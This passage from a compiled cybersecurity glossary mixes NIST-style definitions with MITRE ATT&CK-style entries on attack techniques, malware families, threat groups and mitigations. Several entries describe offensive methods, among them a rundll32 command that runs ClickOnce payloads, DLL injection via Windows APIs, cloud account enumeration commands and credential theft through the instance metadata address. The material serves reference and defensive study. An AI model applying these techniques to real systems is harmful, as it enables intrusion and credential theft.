Definition: An RF transaction in which the tag communicates its presence to a reader. The reader may then send commands to the tag.

Term: air gap
Definition: An interface between two systems at which (a) they are not connected physically and (b) any logical connection is not automated (i.e., data is transferred through the interface only manually, under human control).

Term: IFC
Definition: Integer factorization cryptography

Term: Moderate Impact
Definition: The loss of confidentiality, integrity, or availability that could be expected to have a serious adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in significant damage to organizational assets; 3) results in significant financial loss; or 4) results in significant harm to individuals that does not involve loss of life or serious life-threatening injuries).

Name: ClickOnce
Type: attack-pattern
Description: Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility. ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.

Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install. As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.

ClickOnce may be abused in a number of ways. For example, an adversary may rely on User Execution. When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.

Adversaries may also abuse ClickOnce to execute malware via a Rundll32 script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.

Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., Registry Run Keys / Startup Folder).

Term: verification and validation
Definition: The process of determining whether the requirements for a system or component are complete and correct, the products of each development phase fulfill the requirements or conditions imposed by the previous phase, and the final system or component complies with specified requirements.

Term: Compliance audit
Definition: A comprehensive review of an organization's adherence to governing documents such as whether a Certification Practice Statement satisfies the requirements of a Certificate Policy and whether an organization adheres to its Certification Practice Statement.

Term: Unmanaged Device
Definition: A device inside the assessment boundary that is either unauthorized or, if authorized, not assigned to a person to administer.

Term: Secure channel
Definition: A path for transferring data between two entities or components that ensures confidentiality, integrity and replay protection, as well as mutual authentication between the entities or components. The secure channel may be provided using approved cryptographic, physical or procedural methods, or a combination thereof. Sometimes called a trusted channel.

Term: trust
Definition: A characteristic of an entity that indicates its ability to perform certain functions or services correctly, fairly and impartially, along with assurance that the entity and its identifier are genuine.

Term: Trusted boot
Definition: A system boot where aspects of the hardware and firmware are measured and compared against known good values to verify their integrity and thus their trustworthiness.

Term: Dictionary Search
Definition: The process of determining which identifier names within a CPE dictionary are members of a source name that represents a set of products.

Term: CMI
Definition: A DoD initiative to modernize the NSA-certified cryptographic product inventory.

Term: trust anchor
Definition: A public or symmetric key that is trusted because it is built directly into hardware or software or securely provisioned via out-of-band means rather than because it is vouched for by another trusted entity (e.g., in a public-key certificate). A trust anchor may have name or policy constraints that limit its scope.

Term: SORN
Definition: The notice(s) published by an agency in the Federal Register upon the establishment and/or modification of a system of records describing the existence and character of the system.

Term: DB
Definition: A repository of information or data, which may or may not be a traditional relational database system.

Term: ISSO
Definition: Individual assigned responsibility by the senior agency information security officer, authorizing official, management official, or information system owner for ensuring that the appropriate operational security posture is maintained for an information system or program.

Term: impact level
Definition: The assessed potential impact resulting from a compromise of the confidentiality of information (e.g., CUI) expressed as a value of low, moderate, or high.

Term: Federal Agency Smart Credential Number
Definition: One of the primary identifiers on the PIV Card for physical access control, as required by FIPS 201. The FASC-N is a fixed length (25 byte) data object that is specified in [NIST SP 800-73-4] and included in several data objects on a PIV Card.

Name: Zebrocy
Type: malware
Description: Zebrocy is a Trojan that has been used by APT28 since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang.

Name: Playcrypt
Type: malware
Description: Playcrypt is a ransomware that has been used by Play since at least 2022 in attacks against against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Playcrypt derives its name from adding the .play extension to encrypted files and has overlap with tactics and tools associated with Hive and Nokoyawa ransomware and infrastructure associated with Quantum ransomware.

Term: key transport
Definition: The transport of a key and other keying material from an entity that either owns, generates or otherwise acquires the key to another entity that is intended to use the key.

Term: elephant diffuser
Definition: A (now deprecated) component in BitLocker Drive Encryption to increase resistance against ciphertext modification.

Term: token
Definition: Something the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity. In previous editions of SP 800-63, this was referred to as atoken.

Term: authorizing official designated representative
Definition: An organizational official acting on behalf of an authorizing official in carrying out and coordinating the required activities associated with security authorization or privacy authorization.

Name: Obtain Capabilities
Type: attack-pattern
Description: Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.

In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.

In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.

Name: C0017
Type: campaign
Description: C0017 was an APT41 campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During C0017, APT41 was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of C0017 are unknown, however APT41 was observed exfiltrating Personal Identifiable Information (PII).

Term: unwrapping function
Definition: The inverse of the wrapping function.

Term: extranet
Definition: A computer network that an organization uses for application data traffic between the organization and its business partners.

Name: Permission Groups Discovery
Type: attack-pattern
Description: Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.

Name: StarProxy
Type: malware
Description: StarProxy is custom malware used by Mustang Panda as a post-compromise tool, to enable proxying of traffic between the infected machine and other machines on the same network.

Term: operational margin
Definition: A spare amount or measure or degree allowed or given for contingencies or special situations. The allowances carried to account for uncertainties and risks.

Term: Dedicated Proxy Server
Definition: A form of proxy server that has much more limited firewalling capabilities than an application-proxy gateway.

Name: Netwalker
Type: malware
Description: Netwalker is fileless ransomware written in PowerShell and executed directly in memory.

Term: threat analysis
Definition: Process of formally evaluating the degree of threat to an information system or enterprise and describing the nature of the threat.

Term: Information Sharing and Analysis Organization
Definition: An ISAO is any entity or collaboration created or employed by public- or private sector organizations, for purposes of gathering and analyzing critical cyber and related information in order to better understand security problems and interdependencies related to cyber systems, so as to ensure their availability, integrity, and reliability.

Term: Correlation
Definition: See “Event Correlation”.

Term: <em>Level of Significance (a)</em>
Definition: The probability of falsely rejecting the null hypothesis, i.e., the probability of concluding that the null hypothesis is false when the hypothesis is, in fact, true. The tester usually chooses this value; typical values are 0.05, 0.01 or 0.001; occasionally, smaller values such as 0.0001 are used. The level of significance is the probability of concluding that a sequence is non-random when it is in fact random. Synonyms: Type I error, a error.

Term: <em>KEYn</em>
Definition: Block of data representing KEY n

Name: Dynamic-link Library Injection
Type: attack-pattern
Description: Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. 

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). 

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of <code>LoadLibrary</code>). 

Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's <code>AddressOfEntryPoint</code> before starting a new thread in the target process. This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk. 

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.

Term: life cycle stages
Definition: Period that begins when a system is conceived and ends when the system is no longer available for use.

Term: Identity Assurance Level (IAL)
Definition: A category that conveys the degree of confidence that a person’s claimed identity is their real identity, as defined in [NIST SP 800-63-3] in terms of three levels: IAL 1 (Some confidence), IAL 2 (High confidence), IAL 3 (Very high confidence).

Term: approved
Definition: FIPS-approved and/or NIST-recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation or 3) specified in a list of NIST-approved security functions.

Term: authenticated session
Definition: A session in which messages between two participants are encrypted and integrity is protected using a set of shared secrets called “session keys.” A protected session is said to be authenticated if one participant proves possession of one or more authenticators in addition to the session keys and if the other party can verify the identity associated with the authenticators during the session. If both participants are authenticated, the protected session is said to be mutually authenticated.

Term: Triple Data Encryption Standard
Definition: An implementation of the data encryption standard (DES) algorithm that uses three passes of the DES algorithm instead of one as used in ordinary DES applications. Triple DES provides much stronger encryption than ordinary DES but it is less secure than advanced encryption standard (AES). 
Rationale: The terminology has been changed by NIST.

Term: compensating controls
Definition: Alternative controls to the normative controls for the assessed and selected xALs of an organization based on that organization’s mission, risk tolerance, business processes, risk assessments, and considerations for the privacy, usability, and customer experience of the populations served by the online service.

Term: Key size
Definition: The length of a key in bits; used interchangeably with “Key length”.

Term: architecture
Definition: A set of physical and logical security-relevant representations (i.e., views) of system architecture that conveys information about how the system is partitioned into security domains and makes use of security-relevant elements to enforce security policies within and between security domains based on how data and information must be protected. Note: The security architecture reflects security domains, the placement of security-relevant elements within the security domains, the interconnections and trust relationships between the security-relevant elements, and the behavior and interaction between the security-relevant elements. The security architecture, similar to the system architecture, may be expressed at different levels of abstraction and with different scopes.

Term: baseline
Definition: Predefined sets of controls specifically assembled to address the protection needs of groups, organizations, or communities of interest. See privacy control baseline or security control baseline.

Term: special category
Definition: Sensitive compartmented information (SCI), special access program (SAP) information, or other compartment information.

Term: security assessment
Definition: The testing or evaluation of security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for an information system or organization.

Name: Raspberry Robin
Type: malware
Description: Raspberry Robin is initial access malware first identified in September 2021, and active through early 2024. The malware is notable for spreading via infected USB devices containing a malicious LNK object that, on execution, retrieves remote hosted payloads for installation. Raspberry Robin has been widely used against various industries and geographies, and as a precursor to information stealer, ransomware, and other payloads such as SocGholish, Cobalt Strike, IcedID, and Bumblebee. The DLL componenet in the Raspberry Robin infection chain is also referred to as "Roshtyak." The name "Raspberry Robin" is used to refer to both the malware as well as the threat actor associated with its use, although the Raspberry Robin operators are also tracked as <code>Storm-0856</code> by some vendors.

Term: Fresh
Definition: Newly established keying material is considered to be fresh if the probability of being equal to any previously established keying material is acceptably small. The acceptably small probability may be application specific.

Term: Entropy Input
Definition: An input bitstring that provides an assessed minimum amount of unpredictability for a DRBG mechanism. (See min-entropy.)

Term: Registrar
Definition: Also known as a Registration Agent, a person who performs the enrollment process.

Term: <em>(n, d)</em>
Definition: RSA private key in the basic format.

Term: Key-Encapsulation Mechanism
Definition: A set of three cryptographic algorithms: KeyGen (key generation), Encaps (encapsulation), and Decaps (decapsulation). These algorithms can be used by two parties to securely establish a shared secret key over a public channel.

Term: l(n)
Definition: Lambda function of the RSA modulus n, i.e., the least positive integer i such that 1= ai mod n for all a relatively prime to n. When n = p ´ q, l(n) = LCM(p - 1, q - 1).

Term: criticality
Definition: Degree of impact that a requirement, module, error, fault, failure, or other item has on the development or operation of a system.

Name: SLIGHTPULSE
Type: malware
Description: SLIGHTPULSE is a web shell that was used by APT5 as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) entities.

Name: Data Backup
Type: course-of-action
Description: Data Backup involves taking and securely storing backups of data from end-user systems and critical servers. It ensures that data remains available in the event of system compromise, ransomware attacks, or other disruptions. Backup processes should include hardening backup systems, implementing secure storage solutions, and keeping backups isolated from the corporate network to prevent compromise during active incidents. This mitigation can be implemented through the following measures:

Regular Backup Scheduling:
- Use Case: Ensure timely and consistent backups of critical data.
- Implementation: Schedule daily incremental backups and weekly full backups for all critical servers and systems.

Immutable Backups:
- Use Case: Protect backups from modification or deletion, even by attackers.
- Implementation: Use write-once-read-many (WORM) storage for backups, preventing ransomware from encrypting or deleting backup files.

Backup Encryption:
- Use Case: Protect data integrity and confidentiality during transit and storage.
- Implementation: Encrypt backups using strong encryption protocols (e.g., AES-256) before storing them in local, cloud, or remote locations.

Offsite Backup Storage:
- Use Case: Ensure data availability during physical disasters or onsite breaches.
- Implementation: Use cloud-based solutions like AWS S3, Azure Backup, or physical offsite storage to maintain a copy of critical data.

Backup Testing:
- Use Case: Validate backup integrity and ensure recoverability.
- Implementation: Regularly test data restoration processes to ensure that backups are not corrupted and can be recovered quickly.

Term: Container-specific operating system
Definition: A minimalistic host operating system explicitly designed to only run containers.

Term: <em>qInv</em>
Definition: Inverse of q modulo p in the CRT format, i.e., q-1 mod p; an integer.

Name: Cloud Account
Type: attack-pattern
Description: Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

With authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365. The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain. 

The AWS command <code>aws iam list-users</code> may be used to obtain a list of users in the current account while <code>aws iam list-roles</code> can obtain IAM roles that have a specified path prefix. In GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects get-iam-policy</code> may be used to obtain a listing of service accounts and users in a project.

Term: memorized secret
Definition: A string of characters (letters, numbers and other symbols) that are used to authenticate an identity or to verify access authorization. A passphrase is a special case of a password that is a sequence of words or other text. In this document, the use of the term “password' includes this special case.

Name: Password Policies
Type: course-of-action
Description: Set and enforce secure password policies for accounts to reduce the likelihood of unauthorized access. Strong password policies include enforcing password complexity, requiring regular password changes, and preventing password reuse. This mitigation can be implemented through the following measures:

Windows Systems:

- Use Group Policy Management Console (GPMC) to configure:
 - Minimum password length (e.g., 12+ characters).
 - Password complexity requirements.
 - Password history (e.g., disallow last 24 passwords).
 - Account lockout duration and thresholds.

Linux Systems:

- Configure Pluggable Authentication Modules (PAM):
- Use `pam_pwquality` to enforce complexity and length requirements.
- Implement `pam_tally2` or `pam_faillock` for account lockouts.
- Use `pwunconv` to disable password reuse.

Password Managers:

- Enforce usage of enterprise password managers (e.g., Bitwarden, 1Password, LastPass) to generate and store strong passwords.

Password Blacklisting:

- Use tools like Have I Been Pwned password checks or NIST-based blacklist solutions to prevent users from setting compromised passwords.

Regular Auditing:

- Periodically audit password policies and account configurations to ensure compliance using tools like LAPS (Local Admin Password Solution) and vulnerability scanners.

*Tools for Implementation*

Windows:

- Group Policy Management Console (GPMC): Enforce password policies.
- Microsoft Local Administrator Password Solution (LAPS): Enforce random, unique admin passwords.

Linux/macOS:

- PAM Modules (pam_pwquality, pam_tally2, pam_faillock): Enforce password rules.
- Lynis: Audit password policies and system configurations.

Cross-Platform:

- Password Managers (Bitwarden, 1Password, KeePass): Manage and enforce strong passwords.
- Have I Been Pwned API: Prevent the use of breached passwords.
- NIST SP 800-63B compliant tools: Enforce password guidelines and blacklisting.

Term: WAP identity module
Definition: a security module implemented in the SIM that provides a trusted environment for using WAP related applications and services on a mobile device via a WAP gateway.

Name: STEADYPULSE
Type: malware
Description: STEADYPULSE is a web shell that infects targeted Pulse Secure VPN servers through modification of a legitimate Perl script that was used as early as 2020 including in activity against US Defense Industrial Base (DIB) entities.

Term: White Box Testing
Definition: (also known as clear box testing, glass box testing, transparent box testing, and structural testing) is a method of testing software that tests internal structures or workings of an application, as opposed to its functionality (i.e. black-box testing).

Term: Decryption
Definition: The process of transforming ciphertext into plaintext using a cryptographic algorithm and key.

Term: 3TDEA
Definition: Three-key Triple Data Encryption Algorithm specified in [NIST SP 800-67].

Term: IR
Definition: See incident handling.

Term: control enhancement
Definition: Augmentation of a security or privacy control to build in additional but related functionality to the control, increase the strength of the control, or add assurance to the control.

Term: VM
Definition: A virtual data processing system that appears to be at the disposal of a particular user but whose functions are accomplished by sharing the resources of a real data processing system

Term: transdisciplinary
Definition: Creating a unity of intellectual frameworks beyond the disciplinary perspectives.

Term: Volatile Data
Definition: Data on a live system that is lost after a computer is powered down.

Name: UBoatRAT
Type: malware
Description: UBoatRAT is a remote access tool that was identified in May 2017.

Term: information owner
Definition: Official with statutory or operational authority for specified information and responsibility for establishing the controls for its generation, classification, collection, processing, dissemination, and disposal. See information steward. 
Note: Information steward is a related term, but it is not identical to information owner.

Term: Message
Definition: The data that is signed. Also known as signed data during the signature verification and validation process.

Term: IV
Definition: The initialization vector.

Term: Trusted Third Party
Definition: An entity other than the key pair owner and the verifier that is trusted by the owner, the verifier, or both. Sometimes shortened to “trusted party.”

Term: State Channel
Definition: A scheme that enables the off-chain processing of transactions by a group of participants with instant second layer finality and deferred on-chain settlement via state updates.

Term: Virtual machine monitor (VMM)
Definition: See “hypervisor”.

Term: common fill device (CFD)
Definition: A COMSEC item used to transfer or store key in electronic form or to insert key into cryptographic equipment.

Term: COMSEC demilitarization
Definition: Process of preparing COMSEC equipment for disposal by extracting all controlled cryptographic item (CCI), classified, or CRYPTO marked components for their secure destruction, as well as defacing and disposing of the remaining equipment hulk. 
Rationale: Demilitarize is the proper term and does not apply solely to COMSEC.

Term: central office of record
Definition: The entity that keeps records of accountable COMSEC material held by COMSEC accounts subject to its oversight.

Name: ShrinkLocker
Type: malware
Description: ShrinkLocker is a VBS-based malicious script that leverages the legitimate Bitlocker application to encrypt files on victim systems for ransom. ShrinkLocker functions by using Bitlocker to encrypt files, then renames impacted drives to the adversary’s contact email address to facilitate communication for the ransom payment.

Term: Personal Information Management (PIM) Applications
Definition: A core set of applications that provide the electronic equivalents of an agenda, address book, notepad, and business card holder.

Term: privacy control assessment
Definition: See Security Control Assessment.

Term: Kerberos
Definition: A widely used authentication protocol developed at MIT. In “classic” Kerberos, users share a secret password with a Key Distribution Center (KDC). The user, Alice, who wishes to communicate with another user, Bob, authenticates to the KDC and is furnished a “ticket” by the KDC to use to authenticate with Bob.

Name: MoustachedBouncer
Type: intrusion-set
Description: MoustachedBouncer is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.

Term: system element
Definition: Member of a set of elements that constitute a system.
Note 1: A system element can be a discrete component, product, service, subsystem, system, infrastructure, or enterprise.
Note 2: Each element of the system is implemented to fulfill specified requirements.
Note 3: The recursive nature of the term allows the term system to apply equally when referring to a discrete component or to a large, complex, geographically distributed system-of-systems.
Note 4: System elements are implemented by: hardware, software, and firmware that perform operations on data/information; physical structures, devices, and components in the environment of operation; and the people, processes, and procedures for operating, sustaining, and supporting the system elements.

Term: <em>SKEY</em>
Definition: A session key in TPM.

Name: Cloud Instance Metadata API
Type: attack-pattern
Description: Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance. A cloud metadata API has been used in at least one high profile compromise.

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.

Term: Bit Length
Definition: A positive integer that expresses the number of bits in a bit string.

Term: Statistically Independent Events
Definition: Two events are independent if the occurrence of one event does not affect the chances of the occurrence of the other event. The mathematical formulation of the independence of events A and B is the probability of the occurrence of both A and B being equal to the product of the probabilities of A and B (i.e., P(A and B) = P(A)P(B)).

Name: Masquerading
Type: attack-pattern
Description: Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of Masquerading.

Term: key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. For the purposes of these guidelines, key requirements shall meet the minimum requirements stated in Table 2 of NIST SP 800-57 Part 1. 
See also Asymmetric Keys, Symmetric Key.

Term: common control
Definition: A security control that is inherited by one or more organizational information systems. 
See security control inheritance.

Term: media
Definition: Physical devices or writing surfaces, including but not limited to magnetic tapes, optical disks, magnetic disks, Large-Scale Integration (LSI) memory chips, and printouts (but not including display media) onto which information is recorded, stored, or printed within a system.

Term: Uninstantiate
Definition: The termination of a DRBG instantiation.

Term: Behavior Management
Definition: An ISCM capability that ensures that people are aware of expected security-related behavior and are able to perform their duties to prevent advertent and inadvertent behavior that compromises information.

Term: integrity violation
Definition: In the AML context, an AI system being forced to misperform against its intended objectives, producing outputs or predictions that align with the at­tacker’s objective.

Term: Validated ROA Payload
Definition: Validated ROA Payload contains {prefix, max length, origin AS} information from an X.509 validated ROA.

Term: <em>kLen</em>
Definition: The length of K in bits

Term: Decryption
Definition: The process of transforming ciphertext into plaintext.

Term: public key certificate
Definition: A data structure that contains an entity’s identifier(s), the entity's public key (including an indication of the associated set of domain parameters) and possibly other information, along with a signature on that data set that is generated by a trusted party, i.e. a certificate authority, thereby binding the public key to the included identifier(s).

Term: vulnerability analysis
Definition: Systematic examination of a system or product or supply chain element to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.

Term: SQL injection
Definition: Attacks that look for web sites that pass insufficiently-processed user input to database back-ends

Name: RTM
Type: intrusion-set
Description: RTM is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name (RTM).

Term: Side-Channel Attack
Definition: An attack enabled by the leakage of information from a deployed cryptosystem. Characteristics that could be exploited in a side-channel attack include timing, power consumption, and electromagnetic and acoustic emissions.

Name: DarkWatchman
Type: malware
Description: DarkWatchman is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.

Name: Gorgon Group
Type: intrusion-set
Description: Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States.

Term: interconnection
Definition: See system interconnection.

Term: security function
Definition: Cryptographic algorithms, together with modes of operation (if appropriate); for example, block ciphers, digital signature algorithms, asymmetric key-establishment algorithms, message authentication codes, hash functions, or random bit generators; see FIPS 140.

Term: security control assessment
Definition: The testing and/or evaluation of the management, operational, and technical security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for an information system or organization.

Name: Daggerfly
Type: intrusion-set
Description: Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.

Term: Ephemeral key pair
Definition: A key pair, consisting of a public key (i.e., an ephemeral public key) and a private key (i.e., an ephemeral private key) that is intended for a very short period of use. The key pair is ordinarily used in exactly one transaction of a cryptographic scheme; an exception to this is when the ephemeral key pair is used in multiple transactions for a key-transport broadcast. Contrast with a static key pair.

Term: Capability, Event Preparation Management
Definition: See Capability, Event Preparation Management.

Term: sensitivity
Definition: A measure of the importance assigned to information by its owner, for the purpose of denoting its need for protection.

Term: Manageability
Definition: Providing the capability for granular administration of personally identifiable information, including alteration, deletion, and selective disclosure.

Term: low impact
Definition: The loss of confidentiality, integrity, or availability that could be expected to have a limited adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is noticeably reduced; 2) results in minor damage to organizational assets; 3) results in minor financial loss; or 4) results in minor harm to individuals).

Term: Capability, Hardware Asset Management
Definition: An ISCM capability that identifies unmanaged devices that are likely to be used by attackers as a platform from which to extend compromise of the network to be mitigated.

Term: Intended owner
Definition: An entity that intends to act as a signatory but has not yet obtained a private key that will be used to generate digital signatures.

Name: httpclient
Type: malware
Description: httpclient is malware used by Putter Panda. It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool.

Name: BLINDINGCAN
Type: malware
Description: BLINDINGCAN is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.

Term: failover
Definition: The capability to switch over automatically (typically without human intervention or warning) to a redundant or standby system upon the failure or abnormal termination of the previously active system.

Term: PPI
Definition: An opaque unguessable subscriber identifier generated by a CSP for use at a specific individual RP. This identifier is only known to and only used by one CSP-RP pair.

Term: CUI
Definition: Information that law, regulation, or government-wide policy requires to have safeguarding or disseminating controls, excluding information that is classified under Executive Order 13526, Classified National Security Information, December 29, 2009, or any predecessor or successor order, or the Atomic Energy Act of 1954, as amended.

Term: authorize processing
Definition: The official management decision given by a senior agency official to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals, based on the implementation of an agreed-upon set of security controls.

Term: Autonomous System Number (ASN)
Definition: A two-byte number that identifies an AS.

Term: Federation Assurance Level (FAL)
Definition: A category describing the assertion protocol used by the federation to communicate authentication and attribute information (if applicable) to an RP.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact agency operations (including safety, mission, functions, image, or reputation), agency assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Term: Cyber
Definition: refers to both information and communications networks.

Term: party
Definition: A human (person/individual/user), organization, device or process.

Term: Minor version update
Definition: A revision of a specification that may add or enhance functionality, fix bugs, and make other changes from the previous revision, but the changes have minimal impact, if any, on backward compatibility.

Term: average query
Definition: A query that determines the mean of some set of values.

Term: eXtensible HyperText Markup Language
Definition: a unifying standard that brings the XML benefits of easy validation and troubleshooting to HTML.

Term: Capability, Security
Definition: See capability.

Term: key establishment
Definition: A stage in the lifecycle of keying material; the process by which cryptographic keys are securely distributed among cryptographic modules using manual transport methods (e.g., key loaders), automated methods (e.g., key transport and/or key agreement protocols), or a combination of automated and manual methods (consists of key transport plus key agreement).

Term: privacy parameter
Definition: A parameter of a differential privacy definition that partly or wholly determines privacy loss.

Term: control inheritance
Definition: A situation in which a system or application receives protection from controls (or portions of controls) that are developed, implemented, assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides.

Name: DEADEYE
Type: malware
Description: DEADEYE is a malware launcher that has been used by APT41 since at least May 2021. DEADEYE has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).

Name: Cloud Accounts
Type: attack-pattern
Description: Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.

Creating Cloud Accounts may also require adversaries to establish Email Accounts to register with the cloud provider.

Term: Key custodian
Definition: An FCKMS role that is responsible for distributing keys or key splits and/or entering them into a cryptographic module.

Term: PFS
Definition: An option available during quick mode that causes a new shared secret to be created through a Diffie-Hellman exchange for each IPsec SA.

Term: Archive
Definition: Verb: To place a cryptographic key and/or metadata into long-term storage that will be maintained even if the storage technology changes.

Name: Server Software Component
Type: attack-pattern
Description: Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.

Term: Standard operating procedures
Definition: A set of instructions used to describe a process or procedure that performs an explicit operation or explicit reaction to a given event.

Term: approval to operate
Definition: The official management decision issued by a designated accrediting authority (DAA) or principal accrediting authority (PAA) to authorize operation of an information system and to explicitly accept the residual risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals.

Name: Naid
Type: malware
Description: Naid is a trojan used by Elderwood to open a backdoor on compromised hosts.

Term: common control provider
Definition: An organizational official responsible for the development, implementation, assessment, and monitoring of common controls (i.e., security controls inheritable by information systems).

Term: communications security
Definition: A component of Information Assurance that deals with measures and controls taken to deny unauthorized persons information derived from telecommunications and to ensure the authenticity of such telecommunications. COMSEC includes cryptographic security, transmission security, emissions security, and physical security of COMSEC material.

Term: common control provider
Definition: An organizational official responsible for the development, implementation, assessment, and monitoring of common controls (i.e., controls inheritable by organizational systems).

Term: incident response
Definition: See “incident handling.”

Term: Seed
Definition: A secret value that is used to initialize a process (e.g., a deterministic random bit generator). Also see RNG seed.

Term: security control and privacy control
Definition: Measure that is modifying risk.

Name: Data from Removable Media
Type: attack-pattern
